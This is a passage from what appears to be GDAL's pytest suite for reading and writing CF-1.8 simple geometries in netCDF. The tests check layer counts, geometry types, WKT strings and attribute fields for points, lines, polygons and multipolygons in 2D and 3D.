assert(ft_wkt == "MULTIPOLYGON (((3 0 5,4 0 10,4 1 10,3 0 5)),((3 0 10,4 1 15,3 1 15,3 0 10)))")
def test_serpenski_two_ring():
if gdaltest.netcdf_drv is None:
pytest.skip()
s = ogr.Open("data/netcdf-sg/serpenski_2nd.nc")
assert(s != None)
lc = s.GetLayerCount()
assert(lc == 1)
good_layer = s.GetLayerByName("serpenski")
assert(good_layer != None) # real layer
assert(good_layer.GetFeatureCount() == 1)
assert(good_layer.GetGeomType() == ogr.wkbMultiPolygon)
serpenski = good_layer.GetNextFeature()
triangle = serpenski.GetGeometryRef()
st_wkt = triangle.ExportToWkt()
assert(st_wkt == \
"MULTIPOLYGON (((0 0,1 0,0.5 0.866025403784439,0 0),(0.5 0.0,0.75 0.433012701892219,0.25 0.433012701892219,0.5 0.0)))")
def test_serpenski3D_two_ring():
if gdaltest.netcdf_drv is None:
pytest.skip()
s = ogr.Open("data/netcdf-sg/serpenski3D_2nd.nc")
assert(s != None)
lc = s.GetLayerCount();
assert(lc == 1)
good_layer = s.GetLayerByName("serpenski")
assert(good_layer != None) # real layer
assert(good_layer.GetFeatureCount() == 1)
assert(good_layer.GetGeomType() == ogr.wkbMultiPolygon25D)
serpenski = good_layer.GetNextFeature()
triangle = serpenski.GetGeometryRef()
st_wkt = triangle.ExportToWkt()
assert(st_wkt == \
"MULTIPOLYGON (((0 0 1,1 0 1,0.5 0.866025403784439 1,0 0 1),(0.5 0.0 1,0.75 0.433012701892219 1,0.25 0.433012701892219 1,0.5 0.0 1)))")
def test_flipped_axis():
if gdaltest.netcdf_drv is None:
pytest.skip()
# similar to simple polygon test, but with flipped axis
polygon = ogr.Open("data/netcdf-sg/flipped_axes_test.nc")
assert(polygon != None)
layer = polygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((0 0,1 0,1 1,0 0))")
def test_arbitrary_3Daxis_order_():
if gdaltest.netcdf_drv is None:
pytest.skip()
polygon = ogr.Open("data/netcdf-sg/arbitrary_axis_order_test.nc")
assert(polygon != None)
layer = polygon.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((0 0 1,1 0 2,1 1 2,0 0 1))")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "POLYGON ((3 0 1,4 0 1,4 1 1,3 1 1,3 0 1))")
def test_multiple_layers_one_nc():
if gdaltest.netcdf_drv is None:
pytest.skip()
# tests whether or not an NC with multiple geometry containers can be read
# each geometry container a layer
s = ogr.Open("data/netcdf-sg/multiple_containers.nc")
lc = s.GetLayerCount()
assert(lc == 2)
s_triangle = s.GetLayerByName("serpenski")
s_outline = s.GetLayerByName("serpenski_outline")
assert(s_triangle != None)
assert(s_outline != None)
triangle_ft = s_triangle.GetNextFeature()
triangle = triangle_ft.GetGeometryRef()
assert(triangle.GetGeometryType() == ogr.wkbMultiPolygon)
st_wkt = triangle.ExportToWkt()
assert(st_wkt == \
"MULTIPOLYGON (((0 0,1 0,0.5 0.866025403784439,0 0),(0.5 0.0,0.75 0.433012701892219,0.25 0.433012701892219,0.5 0.0)))")
outline_ft = s_outline.GetNextFeature()
outline = outline_ft.GetGeometryRef()
assert(outline.GetGeometryType() == ogr.wkbMultiLineString)
so_wkt = outline.ExportToWkt()
assert(so_wkt == \
"MULTILINESTRING ((0 0,1 0,0.5 0.866025403784439,0 0),(0.5 0.0,0.75 0.433012701892219,0.25 0.433012701892219,0.5 0.0))")
# advanced tests
def test_yahara():
if gdaltest.netcdf_drv is None:
pytest.skip()
yahara = ogr.Open("data/netcdf-sg/Yahara_alb.nc")
assert(yahara != None)
y_layer = yahara.GetLayerByName("geometry_container")
assert(y_layer != None)
# Assert some basic properties
assert(y_layer.GetFeatureCount() == 71)
assert(y_layer.GetGeomType() == ogr.wkbMultiPolygon)
# Test getting a single feature through iteration
first = y_layer.GetNextFeature()
# Check fields are set correctly
assert(first.GetFieldAsInteger("ID") == 1)
assert(first.GetFieldAsInteger("GRIDCODE") == 55)
assert(first.GetFieldAsDouble("X_COORD") == 577251.43302)
assert(first.GetFieldAsDouble("Y_COORD") == 319799.04918)
# Check spatial ref is set correctly
fSRS = y_layer.GetSpatialRef()
assert(fSRS is not None)
assert(fSRS.ExportToWkt() == "PROJCS[\"unnamed\",GEOGCS[\"unknown\",DATUM[\"unnamed\",SPHEROID[\"Spheroid\",6378137,298.257223563]],PRIMEM[\"Greenwich\",0],UNIT[\"degree\",0.0174532925199433,AUTHORITY[\"EPSG\",\"9122\"]]],PROJECTION[\"Albers_Conic_Equal_Area\"],PARAMETER[\"latitude_of_center\",23],PARAMETER[\"longitude_of_center\",-96],PARAMETER[\"standard_parallel_1\",29.5],PARAMETER[\"standard_parallel_2\",45.5],PARAMETER[\"false_easting\",0],PARAMETER[\"false_northing\",0],UNIT[\"metre\",1,AUTHORITY[\"EPSG\",\"9001\"]],AXIS[\"Easting\",EAST],AXIS[\"Northing\",NORTH]]")
def test_states_full_layer():
if gdaltest.netcdf_drv is None:
pytest.skip()
states = ogr.Open("data/netcdf-sg/cf1.8_states.nc")
assert(states != None)
s_layer = states.GetLayerByName("geometry_container")
assert(s_layer != None)
# Assert some basic properties (again)
assert(s_layer.GetFeatureCount() == 49)
assert(s_layer.GetGeomType() == ogr.wkbMultiPolygon)
# Test getting two features
first = s_layer.GetNextFeature()
second = s_layer.GetNextFeature()
# try resetting and then trying again
s_layer.ResetReading()
first_2 = s_layer.GetNextFeature()
# Did reset work correctly?
assert(first.Equal(first_2))
# Sanity check
assert(first.Equal(second) != True)
# Check fields are set correctly
assert(second.GetFieldAsString("STATE_NAME") == "Montana")
assert(second.GetFieldAsInteger("DRAWSEQ") == 3)
assert(second.GetFieldAsString("STATE_FIPS") == "30")
assert(second.GetFieldAsString("STATE_ABBR") == "MT")
###############################################################################
# simple geometry writing tests
def test_point_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/point_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/test_point_write.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/test_point_write.nc")
assert(src is not None)
assert(src.GetLayerCount() == 1)
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2)")
assert(fnam == "FishingSpot4")
def test_point3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/point3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
gdal.VectorTranslate("tmp/test_point3D_write.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/test_point3D_write.nc")
assert(src is not None)
assert(src.GetLayerCount() == 1)
# Test layer properties
layer = nc_tsrc.GetLayerByName("point_collection")
assert(layer is not None)
assert(layer.GetFeatureCount() == 4)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (0.5 -0.5 -1.5)")
assert(fnam == "FishingSpot1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1 -1 -0.5)")
assert(fnam == "FishingSpot2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (1.5 -1.5 0.5)")
assert(fnam == "FishingSpot3")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POINT (2 -2 1.5)")
assert(fnam == "FishingSpot4")
def test_line_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/line_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/line_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/line_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("segv")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (1.5 -1.5)")
assert(fnam == "seg1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (30.5 30.5,5 5)")
assert(fnam == "seg2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (9 -9,10 -10,-1 1)")
assert(fnam == "seg3")
def test_line3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/line3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/line3D_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/line3D_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("path")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (0.1 0.2 0.3,99 -99 0)")
assert(fnam == "path1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (100 101 102,25 27 29)")
assert(fnam == "path2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "LINESTRING (7 -11 -7,-11 7 11,-6 1945 1918)")
assert(fnam == "path3")
def test_polygon_no_ir_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/polygon_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/polygon_no_ir_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/polygon_no_ir_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("noir_write")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
# Do to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons
# But when being written out, they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POLYGON ((0 0,1 0,1 1,0 0))")
assert(fnam == "Triangle")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "POLYGON ((3 0,4 0,4 1,3 1,3 0))")
assert(fnam == "Square")
def test_polygon_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/polygon_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/polygon_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/polygon_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
# Do to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons
# But when being written out, they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 1,3 0),(3.5 0.25,3.75 0.25,3.75 0.5,3.5 0.5,3.5 0.25)))")
assert(fnam == "Square_in_Square")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,-1 0,-1 -1,0 0)))")
assert(fnam == "Triangle_Flipped")
def test_polygon3D_no_ir_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/polygon3D_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/polygon3D_no_ir_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/polygon3D_no_ir_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("noir_write")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
# Do to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons
# But when being written out, they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fid = feat.GetFieldAsInteger("ID")
assert(fWkt == "POLYGON ((0 0 0,1 0 2,1 1 0,0 0 2))")
assert(fid == 0)
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fid = feat.GetFieldAsInteger("ID")
assert(fWkt == "POLYGON ((3 0 -1,4 0 -2,4 1 0,3 1 -2,3 0 -1))")
assert(fid == 1)
def test_polygon3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/polygon3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/polygon3D_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/polygon3D_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
# Do to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons
# But when being written out, they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,1 0 -1,1 1 -2,0 0 -3)))")
assert(fnam == "Trianglything")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0 0,4 0 0,4 1 1,3 1 1,3 0 0),(3.5 0.25 1,3.75 0.25 1,3.75 0.5 1,3.5 0.5 1,3.5 0.25 1)))")
assert(fnam == "Prismthing")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,-1 0 1,-1 -1 2,0 0 3)))")
assert(fnam == "Trianglyflipped")
def test_multipoint_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipoint_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipoint_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipoint_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("peak_list")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (1 -1,2 -2,4 -4)")
assert(fnam == "Peaks1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (5 -5,6 -6,8 -8)")
assert(fnam == "Peaks2")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (9 -9,10 -10,-2 2)")
assert(fnam == "Peaks3")
def test_multipoint3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipoint3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipoint3D_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipoint3D_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("drilling_sites")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (0 -1 -5,2 -2 2)")
assert(fnam == "site1")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOINT (7 -2 1,4 3 2,8 -8 3)")
assert(fnam == "site2")
def test_multiline_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multiline_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multiline_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multiline_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("streams")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((1 -5),(2 -4,3 -3,4 -2,5 -1))")
assert(fnam == "fresh_river")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((-2 5,-3 4,-4 3,-5 2))")
assert(fnam == "not_so_fresh_river")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((0 1,1 0),(2 0,-2 0))")
assert(fnam == "not_fresh_river")
def test_multiline3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multiline3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multiline3D_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multiline3D_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("streams")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((1 -5 10),(2 -4 9,3 -3 8,4 -2 7,5 -1 8))")
assert(fnam == "fresh_river")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTILINESTRING ((0 1 1,1 0 2),(2 0 1,-2 0 1))")
assert(fnam == "not_fresh_river")
def test_multipolygon_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipolygon_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
# Do to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons
# But when being written out, they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)),((0 0,-1 0,-1 -1,0 0)))")
assert(fnam == "Triangles")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 1,3 0),(3.5 0.25,3.75 0.25,3.75 0.5,3.5 0.5,3.5 0.25)),((4 4,4 5,5 4,4 4)))")
assert(fnam == "Square_in_Square_and_Triangle")
def test_multipolygon3D_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon3D_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon3D_write_test.nc4", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipolygon3D_write_test.nc4")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("shapes")
assert(layer is not None)
assert(layer.GetFeatureCount() == 3)
# Test each feature manually
# Due to ambiguities present in CF-1.8, these are actually read out as Multipolygons, not Polygons
# But when being written out, they are OGRFeature POLYGON
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,1 0 1,1 1 1,0 0 0)),((0 0 0,-1 0 -1,-1 -1 -1,0 0 0)))")
assert(fnam == "Trianglies")
# This second feature has an interior ring in it
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0 0,4 0 0,4 1 1,3 1 1,3 0 0),(3.5 0.25 0,3.75 0.25 0,3.75 0.5 0.1,3.5 0.5 0.1,3.5 0.25 0)),((4 4 100,4 5 101,5 4 101,4 4 100)))")
assert(fnam == "Prismy_and_Triangly")
# This third feature is just a Polygon
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((-2 0 -5,-2 1 -6,-1 1 -6,-2 0 -5)))")
assert(fnam == "Single_Triangly")
def test_multipolygon_with_no_ir_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon_no_ir_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipolygon_no_ir_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0,1 0,1 1,0 0)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0,4 0,4 1,3 0)),((3 0,4 1,3 1,3 0)))")
assert(fnam == "DoubleTriangle")
def test_multipolygon3D_with_no_ir_write():
if gdaltest.netcdf_drv is None:
pytest.skip()
src = gdal.OpenEx("data/netcdf-sg/write-tests/multipolygon3D_no_ir_write_test.json", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipolygon3D_no_ir_write_test.nc", src, format="netCDF");
nc_tsrc = ogr.Open("tmp/multipolygon3D_no_ir_write_test.nc")
assert(src is not None)
# Test layer properties
layer = nc_tsrc.GetLayerByName("mpoly_shape")
assert(layer is not None)
assert(layer.GetFeatureCount() == 2)
# Test each feature manually
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((0 0 0,1 0 1,1 1 2,0 0 3)))")
assert(fnam == "Triangle")
feat = layer.GetNextFeature();
fgeo = feat.GetGeometryRef()
fWkt = fgeo.ExportToWkt()
fnam = feat.GetFieldAsString("NAMES")
assert(fWkt == "MULTIPOLYGON (((3 0 0,4 0 1,4 1 2,3 0 3)),((3 0 -1,4 1 -2,3 1 -3,3 0 -4)))")
assert(fnam == "DoubleTriangle")
def test_write_buffer_restrict_correctness():
if gdaltest.netcdf_drv is None:
pytest.skip()
# Tests whether or not having the write buffer restriction
# Writes correct data.
src = gdal.OpenEx("data/netcdf-sg/write-tests/Yahara_alb.json")
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/Yahara_alb_4K_restrict.nc", src, format="netCDF", layerCreationOptions = ['BUFFER_SIZE=4096'])
gdal.VectorTranslate("tmp/Yahara_alb_default_buf.nc", src, format="netCDF")
fk_ds = ogr.Open("tmp/Yahara_alb_4K_restrict.nc")
db_ds = ogr.Open("tmp/Yahara_alb_default_buf.nc")
fk_ds_layer = fk_ds.GetLayerByName("geometry_container")
db_ds_layer = db_ds.GetLayerByName("geometry_container")
assert(fk_ds_layer is not None)
assert(db_ds_layer is not None)
for feat in range(71):
lft = fk_ds_layer.GetNextFeature()
dft = db_ds_layer.GetNextFeature()
lftgeo = lft.GetGeometryRef()
dftgeo = dft.GetGeometryRef()
assert(lftgeo.Equal(dftgeo))
def test_write_nc_from_nc():
if gdaltest.netcdf_drv is None:
pytest.skip()
# Tests writing a netCDF file (of different name than source) out from another netCDF source file
src = gdal.OpenEx("data/netcdf-sg/multipoint_test.nc", gdal.OF_VECTOR)
assert(src is not None)
assert(src.GetLayerCount() == 1)
gdal.VectorTranslate("tmp/multipoint_test_replica.nc", src, format="netCDF");
ncds = ogr.Open("tmp/multipoint_test_replica.nc")
assert(src is not None)
layer = ncds.GetLayerByName("names_geometry")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (1 -1,2 -2,3 -3,4 -4)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (5 -5,6 -6,7 -7,8 -8)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (9 -9,10 -10,-1 1,-2 2)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-3 3,-4 4,-5 5,-6 6)")
ft = layer.GetNextFeature()
ft_geo = ft.GetGeometryRef()
ft_wkt = ft_geo.ExportToWkt()
assert(ft_wkt == "MULTIPOINT (-7 7,-8 8,-9 9,-10 10)")
